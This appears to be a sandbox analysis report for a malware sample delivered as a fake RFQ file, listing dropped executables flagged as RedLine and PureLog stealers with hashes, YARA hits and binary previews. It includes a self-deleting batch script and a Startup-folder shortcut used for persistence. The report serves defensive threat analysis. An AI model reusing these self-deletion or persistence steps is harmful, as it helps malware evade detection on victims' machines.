Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	587776
Entropy (8bit):	7.947618401040904
Encrypted:	false
SSDEEP:	12288:vWLLk3UrmqZ4xcVhDoba7m3GTmPe5rmLZNf/lszBaVyYQHm6Fn:v+nrt6xcd7egm2lm7KW4
MD5:	8C8785AC6585CF5C794B74330B3DB88F
SHA1:	ED055892B3C942F8C3C4B4F36D6CA8ED58A037A1
SHA-256:	16212629068CD8F1506D1C90CE6218DABDAC1B5F62B8414DF72F778B0813A8AE
SHA-512:	223836EBC9968CE6CBACBA1CC772399A55F93F8171A9C7E7A75D7DAEEA540D3273AEC5D1DEA664274D1653AFD1F792FF6C22AB41881411C75B7FA46888763DD4
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe, Author: Joe Security
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.f................................. ... ....@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......dx...:..........h...TX...........................................0..........+.(..bd(.....s....... ....( ...(.... ....( ...o.....ds......o....(.... H...( ...o....o.....s..........io.....o..........9.....o......o...........9.....o......9.....o.......(....a..w..........}...................v+.(T..T(.....(....(....o.......0..?.......+.(..?8s...... l...( ...(....o......o......o......o.....(....&*..0..M.......+.(.nW...................... ....( ....... ....( ....... ....(

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_15ujr322.2u2.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a1o3frzb.ufy.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dea4c1jh.f5i.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qlc5sln3.i1e.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\anaboly

Download File

Process:	C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe
File Type:	data
Category:	dropped
Size (bytes):	2598912
Entropy (8bit):	7.912624574770523
Encrypted:	false
SSDEEP:	49152:ICKxNBSov8OutZYmdI0fYEXxhSKF/R7rQpXKUvMfE1x:hKnBdZutZYmdI0phj1qpaFfEr
MD5:	5D25D3AC7ECF6AA78C112FEBFAEDD211
SHA1:	0F18E12F485DFE63AC8C67D53E40C1C882DE4F75
SHA-256:	62D2EDE092090E8BD5D5EF0D138F4EBEF854A6E45E72B4A562003B8A0E59AB54
SHA-512:	6C237CCE88ED8C994703BFA4DA1E1C762C518CAFC047E4D2B27C3F7F0DB83417A1A8E95B5AA9807D36BC957D203B41F33789F8984714C669BF13F9A8BF86880E
Malicious:	false
Reputation:	unknown
Preview:	...QBV3TJFWW..4B.1KASAGL.4OFAN9QAV3TNFWWSF4BB1KASAGLY4OFAN9Q.V3T@Y.YS.=.c.J..`.$0Go63!^# ;.7/(98'fV'bC>/s()l.{.f,!]4o[>^jFWWSF4B.tKA.@CLY4OFAN9QAV3T.FXTXG2BB9KAS.YLY4OF4Z9QAF3TN.IWSFtBB!KASCGL]4OFAN9QEV3TNFWWS..BB5KA..`L[4OFAN)QAF3TNFGWSV4BB1KACAGLY4OFAN9Q..-T.FWWS.B.3KASAGLY4OFAN9QAV3TNFWWSF4BB1KASAGLY4OFAN9QAV3TNFWWSF4BB1KASAGLY4OFAN9QAV3T..IW.F4BB1KASAGLY4OFAN9QAV3TNFWW}2Q:61KA[GGLY$OFAF9QAR3TNFWWSF4BB1KAsAG,wF+'5/9Q..-TNfWWS.BB=KASAGLY4OFAN9Q.V3.`$$$SF4BF1KAS.YLY4OFAN9QAV3TNFWWSF4B.1K.}34>:4OFA.1QA.-TN._WS.*BB1KASAGLY4OF.N9.AV3TNFWWSF4BB1KASAGLY4OFAN9QAV3TNFWWSF4BB1KASAGLY4OFAN9QAV3TNFWWSF4BB1KASAGLY4OFAN9QAV3TNFWWSF4BB1KASAGLY4OFAN9QAV3TNFWWSF4BB1KASAGLY4OFAN9QAV3TNFWWSF4BB1KASAGLY4OFAN9QAV3TNFWWSF4BB1KASAGLY4OFAN9QAV3TNFWWSF4BB1KASAGLY4OFAN9QAV3TNFWWSF4BB1KASAGLY4OFAN9QAV3TNFWWSF4BB1KASAGLY4OFAN9QAV3TNFWWSF4BB1KASAGLY4OFAN9QAV3TNFWWSF4BB1KASAGLY4OFAN9QAV3TNFWWSF4BB1KASAGLY4OFAN9QAV3TNFWWSF4BB1KASAGLY4OFAN9QAV3TNFWWSF4BB1KASAGLY4OFAN9QAV3TNFWWSF4BB1KASAGLY4OFAN9QAV3TNFWWSF4BB1KA

C:\Users\user\AppData\Local\Temp\build.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	307712
Entropy (8bit):	5.081289674980977
Encrypted:	false
SSDEEP:	3072:acZqf7D34Tp/0+mA0kywMlQEg85fB1fA0PuTVAtkxzZ3RMeqiOL2bBOA:acZqf7DItnGCQNB1fA0GTV8kv0L
MD5:	3B6501FEEF6196F24163313A9F27DBFD
SHA1:	20D60478D3C161C3CACB870AAC06BE1B43719228
SHA-256:	0576191C50A1B6AFBCAA5CB0512DF5B6A8B9BEF9739E5308F8E2E965BF9B0FC5
SHA-512:	338E2C450A0B1C5DFEA3CD3662051CE231A53388BC2A6097347F14D3A59257CE3734D934DB1992676882B5F4F6A102C7E15B142434575B8970658B4833D23676
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\build.exe, Author: Joe Security
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....H(...............0.................. ... ....@.. ....................... ............@.................................<...O.... ............................................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B................p.......H....... ...............(w..............................................a.u.t.o.f.i.l.l.5.t.Y.W.R.q.a.W.V.o.a.m.h.h.a.m.J.8.W.W.9.y.b.2.l.X.Y.W.x.s.Z.X.Q.K.a.W.J.u.Z.W.p.k.Z.m.p.t.b.W.t.w.Y.2.5.s.c.G.V.i.a.2.x.t.b.m.t.v.Z.W.9.p.a.G.9.m.Z.W.N.8.V.H.J.v.b.m.x.p.b.m.s.K.a.m.J.k.Y.W.9.j.b.m.V.p.a.W.l.u.b.W.p.i.a.m.x.n.Y.W.x.o.Y.2.V.s.Z.2.J.l.a.m.1.u.a.W.R.8.T.m.l.m.d.H.l.X.Y.W.x.s.Z.X.Q.K.b.m.t.i.a.W.h.m.Y.m.V.v.Z.2.F.l.Y.W.9.l.a.G.x.l.Z.m.5.r.b.2.R.i.Z.W.Z.n.c.G.d.r.b.m.5.8.T.W.

C:\Users\user\AppData\Local\Temp\microsofts.exe

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1425408
Entropy (8bit):	5.68069838387253
Encrypted:	false
SSDEEP:	24576:Pk70Trcosu4CTPpR9+aWsqjnhMgeiCl7G0nehbGZpbD:PkQTAW5v+hDmg27RnWGj
MD5:	1B1EC94BDE0A57A4A82BD2F20B2CB7F3
SHA1:	EADF44C3FE2B366CFFE5A5E5232D3DB261ABDC6F
SHA-256:	2F2A9608F9B6C29C0E7AA3A4E4BD4CCBBE1194CCD430A643E1EA4A684AFE6A9F
SHA-512:	425451934FD68DAFBA0B72083A31E2AA9FF4CE850C89149E19318A32D1BE9E2E07448E06497DCACCC722F34239FBD17B4B1F5CD0117D97DF9B05A9CF50F19703
Malicious:	true
Yara Hits:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\microsofts.exe, Author: ditekSHen
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h..-,q.~,q.~,q.~2#.~?q.~...~+q.~,q.~\q.~2#n~.q.~2#i~.q.~2#{~-q.~Rich,q.~................0y.f....PE..L...t..P..........#................./.............@.............................................................................P....`..pg..............................................................@............................................text............................... ..`.rdata...m.......n..................@..@.data....0... ......................@....rsrc........`....... ..............@...................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\server_BTC.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	231936
Entropy (8bit):	5.039764014369673
Encrypted:	false
SSDEEP:	3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
MD5:	50D015016F20DA0905FD5B37D7834823
SHA1:	6C39C84ACF3616A12AE179715A3369C4E3543541
SHA-256:	36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
SHA-512:	55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...\|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!......s3...z...s..........(.....Z~ ...oK...~....(!.....(5....&.(!.....".......".(u....Vs....(v...t.........&..(.....Br...p(.....(....sL....).......0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

C:\Users\user\AppData\Local\Temp\tmpE6E4.tmp.cmd

Download File

Process:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	162
Entropy (8bit):	4.994551174412709
Encrypted:	false
SSDEEP:	3:mKDDCMNvFbuov3Dt+kiE2J5xAIJWAdEFKDwU1hGDt+kiE2J5xAInTRIKTrVyIBQk:hWKdbuoLwkn23fJWAawDNewkn23fTrHn
MD5:	95CDAFCDF8BD10AAC340B2E0756AAEC4
SHA1:	50F9FFCDC5D508051C5B6A390FD655FA45F9B025
SHA-256:	3C2D27E6E31AA5DA2794BB795A91925589D997F643A648D500809B5C0BF6E05C
SHA-512:	8F4A66D38937B7E79994B5264BDC2AF21BC86780CCA607C69CE3AB41EAE63256B13093B87966B54DE742CD737CB2234622FF2A1B16AE7653FEA1C53F42BE9427
Malicious:	false
Reputation:	unknown
Preview:	@echo off..timeout 6 > NUL..CD C:\Users\user\AppData\Local\Temp..DEL "server_BTC.exe" /f /q..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpE6E4.tmp.cmd" /f /q..

C:\Users\user\AppData\Roaming\76fb15a314ced2a4.bin

Download File

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	DOS executable (COM, 0x8C-variant)
Category:	dropped
Size (bytes):	12320
Entropy (8bit):	7.98497758034615
Encrypted:	false
SSDEEP:	384:7iq+4RK3UyEgaqVYfs0OtEuzDHswo2WWn+p:2qPo9ELOPDHswo2WT
MD5:	A0CE6DC55ABBD94894DCC5B15A5EF0DE
SHA1:	6E8B1264E35DFF239746E585B59CF66A3892D5DF
SHA-256:	3573187ECB6E2A3508333C5ED87278463FC22310E76B5939853D64681E72D83B
SHA-512:	607AC752BAFB9EE8BEA1053C144C8EDADEE0D23F89A70DC158A36518CC0E69D524232C70B6B4828056CCBAA771664408D734EADA827C41F27720A4F745E84FCF
Malicious:	true
Reputation:	unknown
Preview:	.~.../.....n^.~...g.e..N.?..e!...Q.......pX.1...........!.....ns1.........6.\|...a.V.'..\.&..k..I.Vo"$.5<V.I..?..pspg.....)=.r_Z.".._.....9.....0=.-o_.B..0...6...j.]....R.TR.c. .'.H..M..\|} ....2....5..xw.?X...'dP?...U~.$..V.I..../........Uw.QZ._.-".-.y..Y.0T!$...".fd....DX....b.w...;.C.A.....a.dh`........H<'..h&..0...XU....a...7a.HK.e.d..+#O...{0t.U..;E.G..#gr.\.[...."..^...+2....F..I..#....@.kOC.k..q.3..+N...5........,i..f......7W..u1....y~...$.c..G...2...5A..yc..C.i.....a1...HU..&...C.<...k.).L...w.U.{Y.m.....U..T...W....M...F."q...I..-.k1.....3...0K#K7D....W.._<....l..GP....2..CF.qi...\\4..].Q6.V.z;u1..<.f..Y.N..&Ku9..D....Lb.1.w..R..O.pt.....l=.8....%.1...-@2J...S).&...v.A=kNp6....h.<.z....r)i@.g-........[\|\|......%.A....w...[T....T .v..b.+.....G..r..(R.z...S.......r.){......A..]1H..0).L...[..j...>.>....:.....C.E.E..I.....'(L..y..R.qNVt.D#C....\\.u.p....@+..."...I3.,S.\|>.._...d.a.....g->."K...'.M..r....Q....5H.......a.c....S.....J

C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	231936
Entropy (8bit):	5.039764014369673
Encrypted:	false
SSDEEP:	3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
MD5:	50D015016F20DA0905FD5B37D7834823
SHA1:	6C39C84ACF3616A12AE179715A3369C4E3543541
SHA-256:	36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
SHA-512:	55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...\|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!......s3...z...s..........(.....Z~ ...oK...~....(!.....(5....&.(!.....".......".(u....Vs....(v...t.........&..(.....Br...p(.....(....sL....).......0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
File Type:	MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Icon number=0, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Category:	dropped
Size (bytes):	1828
Entropy (8bit):	2.3974027359555303
Encrypted:	false
SSDEEP:	12:8nsXowAOcQ/tz0/CSL4WWAEgcAQyWlfPOAkRKQ1XH+vO4ZPL1Q1XHrTCNfBT/v4U:8sLDWLq8LSnk9lwO4ZTqlmpdqy
MD5:	E4A501C4472646473850E09DBC6AA13E
SHA1:	2AAB7B13E5702F62301CB1402B5A782A559CC234
SHA-256:	9E38D92845DC355C71089B5DCFC4E3A7EA9781DFF13E38ED1129B5914F16C132
SHA-512:	FDAA8934D6507E0A0AEAC6B88686600E94C0A0EC2581169D4E6F1CC9A790F1825CB725BF27F7AA585E5985743247CF341AB2B49FACE4D635A6A25BDE89047DF6
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@......................................................=....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....T.1...........ACCApi..>............................................A.C.C.A.p.i.....n.2...........TrojanAIbot.exe.P............................................T.r.o.j.a.n.A.I.b.o.t...e.x.e.........A.c.c.S.y.s.%.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.T.r.o.j.a.n.A.I.b.o.t...e.x.e.0.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.s.e.r.v.e.r._.B.T.C...e.x.e.........%USERPROFILE%\AppData\Local\Temp\server_BTC.exe..........................................................................................................

C:\Windows\DtcInstall.log

Download File

Process:	C:\Windows\System32\msdtc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	2313
Entropy (8bit):	5.131457057494496
Encrypted:	false
SSDEEP:	48:32qhuhCehuhqfhuhofhuhE2qhuh6987FMx7F/rt57wt+07FKC7867qrT7FoC786/:Z070s0Y0q0mF7Dm5g
MD5:	A702FC043BFDF73068885DEF1FE66AE1
SHA1:	E294FB9743D70112EAE0DB7201AF8788EC8986EF
SHA-256:	2CF3AF3C72FDF4F636650023B64B784B234F8F4F74639591151D22506F9CFF9D
SHA-512:	736FC6D67684E38944D935C093B3BC0E98ACFB7C8541B3F6BBE260D123F50CD369B27FC968A2B91938DAA3E6396B6EA49BDAC76957413F486B3D8B32AC295BA2
Malicious:	false
Reputation:	unknown
Preview:	12-07-2019 09:17 : DTC Install error = 0, Enter MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (367)..12-07-2019 09:17 : DTC Install error = 0, Action: None, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (396)..12-07-2019 09:17 : DTC Install error = 0, Entering CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1700)..12-07-2019 09:17 : DTC Install error = 0, Exiting CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1876)..12-07-2019 09:17 : DTC Install error = 0, Exit MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (454)..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcSpecialize : Enter, com\complus\dtc\dtc\adme\deployment.cpp (2099) ..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcGeneralize : Enter, com\complus\dtc\dtc\adme\deploy

C:\Windows\Logs\WindowsBackup\WBEngine.0.etl

Download File

Process:	C:\Windows\System32\wbengine.exe
File Type:	dBase III DBT, version number 0, next free block index 10240, 1st item "#\210\371x"
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.558948615262126
Encrypted:	false
SSDEEP:	48:1z4/oYnITyNwEPmPzJGLw2fd/j4hPlPgPEPaHPaOosRXVosRposaXI:O/oYzw9JGXN3w4
MD5:	CA523B93C92AD0934D90E2990B14A52B
SHA1:	6142A79352307B2DA5549A2FA006935C5352020C
SHA-256:	9679CA859559775ADF9575D34A6DF5DF978B6EACFAE7B4A009AAE547281A1A0C
SHA-512:	1A2252729B328EC6D847823AB6B0F43277B0B24212D4FEDB62AB9588C47AB46844A519F4737B1130E8E6C0EEC561117D185C03ECFD5E7CE316B1DF5A6A19EE50
Malicious:	false
Reputation:	unknown
Preview:	.(..@...@...........................................!...................................#..x.............(......eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................O.................#..........W.B.E.n.g.i.n.e...C.:.\.W.i.n.d.o.w.s.\.L.o.g.s.\.W.i.n.d.o.w.s.B.a.c.k.u.p.\.W.B.E.n.g.i.n.e...0...e.t.l...........P.P.........#..x................................................................8.B.#..x....19041.1.amd64fre.vb_release.191206-1406.....,.@.#..x...............'"a.-....spp.pdb...........@.#..x.....T.c..i.\.C.s"8@....vssvc.pdb......./.@.#..x....W.p.D.......]....vssapi.pdb......-.@.#..x.....\..Q....T*&.......udfs.pdb........0.@.#..x......B..,`..9..4.....ifsutil.pdb.....-.@.#..x....I:...S%9.`...'.R....uudf.pdb........1.@.#..x...........1$OI"......wbengine.pdb................................

C:\Windows\SysWOW64\perfhost.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1150976
Entropy (8bit):	5.038937280730095
Encrypted:	false
SSDEEP:	12288:PeXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:PesqjnhMgeiCl7G0nehbGZpbD
MD5:	F1E10FE188A674DD70DDE06D821B689D
SHA1:	1D632DE4C11122CA029574DB84879BA407CC8A5A
SHA-256:	176966B5171DB7E93BFB22A98E86EA900E99E1750E2F3D0EC67032B959E1E1C9
SHA-512:	C091383728EE031B0D165251EDA98E5FDCBE06125CA46EBFB1E4D6116995F33AEB1820228A006C35591EAEBDD35A79DD0014767037FA86D3450E50FB526F2246
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........+-.~E~.~E~.~E~...~.~E~..F..~E~..A..~E~.~D~.~E~..D..~E~..@..~E~..L..~E~...~.~E~..G..~E~Rich.~E~................PE..L...CY]..................&...,...............@....@.................................E............ ..........................lQ..@....`..................................T............................................P..h............................text....%.......&.................. ..`.data........@.......*..............@....idata.......P.......,..............@..@.rsrc........`.......8..............@..@.reloc...P.......@...P..............@...........................................................................................................................................................................................................................................................................................................................

C:\Windows\System32\AgentService.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1801216
Entropy (8bit):	6.974350533411236
Encrypted:	false
SSDEEP:	49152:MwVFr68Vw9wn/6h8N1zid7Dmg27RnWGj:MwVFrssC/d7D527BWG
MD5:	2BED1C40DED153B0705AD41485608E38
SHA1:	B5D2C8D2408FBC682E805117B156C3953A703CF6
SHA-256:	AAD6F24064437E38D70DA1D3A02F85248578024CD07313019DCB4F6F08F3B67D
SHA-512:	A57EE71DDEA5B9E187A1CB426393AEF26CC435915E6F62BC3608E52A6AFABF3BACCC8DF0371FF85CDC7866C06C81ED0EC20D59D27E02AEDBED08E73638DFD17A
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5...qq.Bqq.Bqq.Be..Crq.Be..Ciq.Be..C2q.Be..Cfq.Bqq.BIp.Be..C2q.Be.)Bpq.Be..Cpq.BRichqq.B........PE..d.................".................0..........@.......................................... .......... ......................................X........... ....0...}..................0...T...................(...(...................P................................text............................... ..`.rdata..............................@..@.data...........t..................@....pdata...}...0...~..................@..@.rsrc... ...........................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................

C:\Windows\System32\AppVClient.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1348608
Entropy (8bit):	7.253792747622017
Encrypted:	false
SSDEEP:	24576:xQW4qoNUgslKNX0Ip0MgHCpoMBOuWsqjnhMgeiCl7G0nehbGZpbD:xQW9BKNX0IPgiKMBOuaDmg27RnWGj
MD5:	573992C0DD7C44238DCA534EBFE3BFB0
SHA1:	87CE3481646669BDAB68867D7DAE1A1B539C2695
SHA-256:	DA21A3D47213B96A8E4D79976C54D3302502831196E56D256C81E84B2CE9F55E
SHA-512:	0E7BBE662B01E63F46A2BFB1406A08ED4AC18A3055B2A7AF6677C328278DEA0CA9B2496367531F24EC4F373446B30E97CBC6EB1C352F2FB2E606FD9D33F57498
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@.......................................... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1224192
Entropy (8bit):	5.163582382814115
Encrypted:	false
SSDEEP:	24576:s2G7AbHjkZsqjnhMgeiCl7G0nehbGZpbD:s2G7AbHjIDmg27RnWGj
MD5:	B0F19791467B3CCC51614753749D4D81
SHA1:	1FC532831B573182C5A871F607EAD976EDAA7F99
SHA-256:	E57A1687952D24EA0EE31C13953135EFE9B11538BA9B897C2579A87DE653FC98
SHA-512:	EC512178A3550FB202753A52830A7E2DABC2E647B2C6F95B1C18E9E6D2D5201D21D0EFC368151E336EEDFBA095C08F3B383FA70E0C88F900457A6B9E0FA8E249
Malicious:	true
Reputation:	unknown
